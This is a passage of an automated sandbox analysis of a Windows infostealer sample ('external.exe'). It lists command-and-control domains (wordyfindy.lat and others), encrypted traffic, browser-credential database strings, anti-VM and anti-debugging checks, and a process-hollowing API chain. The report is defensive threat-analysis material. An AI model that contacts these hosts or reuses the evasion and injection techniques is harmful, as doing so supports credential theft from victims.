                Source: external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: external.exe, 00000002.00000003.1882863786.0000000003496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: external.exe, 00000002.00000003.1725467175.0000000003535000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: external.exe, 00000002.00000003.1882590251.00000000035B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: external.exe, 00000002.00000003.1882590251.00000000035B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: external.exe, 00000002.00000003.1725467175.0000000003533000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1859687812.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1725562484.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1725695856.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1860192237.00000000034E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: external.exe, 00000002.00000003.1725562484.00000000034C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: external.exe, 00000002.00000003.1725467175.0000000003533000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1859687812.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1725562484.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1725695856.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1860192237.00000000034E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: external.exe, 00000002.00000003.1725562484.00000000034C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: external.exe, external.exe, 00000002.00000003.1935721640.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996417805.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1949098111.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1908135316.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1908263805.0000000000DF9000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996069207.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1986440657.0000000000DF9000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1932697450.0000000000DEF000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996281365.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1932578761.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1948722276.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1908103899.0000000000DE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wordyfindy.lat/
                Source: external.exe, 00000002.00000003.1986291293.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1949098111.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996069207.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996332941.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996069207.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1948722276.0000000000DF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wordyfindy.lat/api
                Source: external.exe, 00000002.00000002.1996332941.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wordyfindy.lat/api(WA
                Source: external.exe, 00000002.00000002.1996417805.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1949009593.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1948658180.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1948789926.0000000000E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wordyfindy.lat/ff
                Source: external.exe, 00000002.00000002.1996069207.0000000000D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wordyfindy.lat:443/api
                Source: external.exe, 00000002.00000002.1996069207.0000000000D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wordyfindy.lat:443/apiion.txtPK
                Source: external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: external.exe, 00000002.00000003.1882863786.0000000003496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: external.exe, 00000002.00000003.1882590251.00000000035B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: external.exe, 00000002.00000003.1882590251.00000000035B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: external.exe, 00000002.00000003.1882590251.00000000035B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: external.exe, 00000002.00000003.1882590251.00000000035B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: external.exe, 00000002.00000003.1882590251.00000000035B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownHTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_00431A20 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_00431A20
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_0070C0400_2_0070C040
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_006F10000_2_006F1000
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_007061940_2_00706194
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_007112500_2_00711250
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_0071EB720_2_0071EB72
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_0070AC410_2_0070AC41
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_0071CD970_2_0071CD97
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0040A8502_2_0040A850
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0040C1C02_2_0040C1C0
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0042C2732_2_0042C273
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_00435AC02_2_00435AC0
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_00425B502_2_00425B50
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_00422B702_2_00422B70
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0042BB352_2_0042BB35
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_00409BE92_2_00409BE9
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_004103FA2_2_004103FA
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_004084502_2_00408450
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_00414DF02_2_00414DF0
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0043BD902_2_0043BD90
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0040CD9C2_2_0040CD9C
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_00420E702_2_00420E70
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_004387502_2_00438750
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0043C7702_2_0043C770
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_004090502_2_00409050
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_004190582_2_00419058
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_004250792_2_00425079
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_004038C02_2_004038C0
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0041F0E02_2_0041F0E0
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0041C0E02_2_0041C0E0
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_004256842_2_00425684
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_004080902_2_00408090
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_004198902_2_00419890
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0043C0B02_2_0043C0B0
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_004061602_2_00406160
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_004059002_2_00405900
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0042712C2_2_0042712C
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_004351302_2_00435130
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_004339D52_2_004339D5
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_004189F42_2_004189F4
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0040E9A02_2_0040E9A0
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_004119A02_2_004119A0
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0043B9B02_2_0043B9B0
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0041DA602_2_0041DA60
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_00430A602_2_00430A60
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_004042702_2_00404270
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_004222322_2_00422232
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_00402AF02_2_00402AF0
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0042EAF42_2_0042EAF4
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0042834D2_2_0042834D
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0040B3002_2_0040B300
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_00427B002_2_00427B00
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_00416B062_2_00416B06
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0041D3302_2_0041D330
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0041AB302_2_0041AB30
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_0043B33D2_2_0043B33D
                Source: C:\Users\user\Desktop\external.exeCode function: String function: 007066A0 appears 50 times
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs external.exe
                Source: external.exe, 00000000.00000000.1669393545.000000000077E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs external.exe
                Source: external.exe, 00000002.00000002.1995916583.000000000077E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs external.exe
                Source: external.exe, 00000002.00000003.1675488289.00000000027D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs external.exe
                Source: external.exeBinary or memory string: OriginalFilenameRpcPing.exej% vs external.exe
                Source: external.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: external.exeStatic PE information: Section: .bss ZLIB complexity 1.0003301056338028
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/1@2/1
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_00435AC0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_00435AC0
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_03
                Source: external.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\external.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: external.exe, 00000002.00000003.1860056737.00000000034A8000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724920307.00000000034C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: external.exeVirustotal: Detection: 37%
                Source: C:\Users\user\Desktop\external.exeFile read: C:\Users\user\Desktop\external.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\external.exe "C:\Users\user\Desktop\external.exe"
                Source: C:\Users\user\Desktop\external.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\external.exeProcess created: C:\Users\user\Desktop\external.exe "C:\Users\user\Desktop\external.exe"
                Source: C:\Users\user\Desktop\external.exeProcess created: C:\Users\user\Desktop\external.exe "C:\Users\user\Desktop\external.exe"Jump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\external.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: external.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: external.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: external.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: external.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: external.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: external.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_007067C3 push ecx; ret 0_2_007067D6
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DE8F4F push FFFFFFDBh; iretd 2_3_00DE8F60
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DE8F4F push FFFFFFDBh; iretd 2_3_00DE8F60
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DE93CD push esi; retf 2_3_00DE93D0
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DE93CD push esi; retf 2_3_00DE93D0
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DECD07 pushfd ; ret 2_3_00DECD08
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DECD07 pushfd ; ret 2_3_00DECD08
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DF5A5A push ecx; retf 2_3_00DF5A80
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DF5A5A push ecx; retf 2_3_00DF5A80
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DF5A5A push ecx; retf 2_3_00DF5A80
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DF5A5A push ecx; retf 2_3_00DF5A80
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DF5A5A push ecx; retf 2_3_00DF5A80
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DF78D6 push esi; retf 2_3_00DF78D8
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DF78D6 push esi; retf 2_3_00DF78D8
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DF78D6 push esi; retf 2_3_00DF78D8
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DF78D6 push esi; retf 2_3_00DF78D8
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DF78D6 push esi; retf 2_3_00DF78D8
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DFBE30 push eax; retf 2_3_00DFBEE5
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DFBE30 push eax; retf 2_3_00DFBEE5
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DFBE30 push eax; retf 2_3_00DFBEE5
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DFBE30 push eax; retf 2_3_00DFBEE5
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DFBE30 push eax; retf 2_3_00DFBEE5
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DFBE30 push eax; retf 2_3_00DFBEE5
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DFBE30 push eax; retf 2_3_00DFBEE5
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DF5A5A push ecx; retf 2_3_00DF5A80
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DF5A5A push ecx; retf 2_3_00DF5A80
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DF5A5A push ecx; retf 2_3_00DF5A80
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DF5A5A push ecx; retf 2_3_00DF5A80
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DF5A5A push ecx; retf 2_3_00DF5A80
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DF78D6 push esi; retf 2_3_00DF78D8
                Source: C:\Users\user\Desktop\external.exeCode function: 2_3_00DF78D6 push esi; retf 2_3_00DF78D8
                Source: C:\Users\user\Desktop\external.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\external.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\external.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\external.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\external.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-21841
                Source: C:\Users\user\Desktop\external.exe TID: 6312Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\external.exe TID: 6312Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\external.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_00719126 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00719126
                Source: external.exe, 00000002.00000002.1996069207.0000000000D94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWy
                Source: external.exe, 00000002.00000002.1996069207.0000000000D94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: external.exe, 00000002.00000002.1996069207.0000000000D4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                Source: C:\Users\user\Desktop\external.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_00439E70 LdrInitializeThunk,2_2_00439E70
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_0070F2B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0070F2B0
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_0072F19E mov edi, dword ptr fs:[00000030h]0_2_0072F19E
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_006F16C0 mov edi, dword ptr fs:[00000030h]0_2_006F16C0
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_00714ABC GetProcessHeap,0_2_00714ABC
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_0070616C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0070616C
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_0070F2B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0070F2B0
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_00706528 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00706528
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_0070651C SetUnhandledExceptionFilter,0_2_0070651C

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_0072F19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_0072F19E
                Source: C:\Users\user\Desktop\external.exeMemory written: C:\Users\user\Desktop\external.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: bashfulacid.lat
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tentabatte.lat
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: curverpluch.lat
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: talkynicer.lat
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: shapestickyr.lat
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: manyrestro.lat
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: slipperyloo.lat
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wordyfindy.lat
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: bellflamre.click
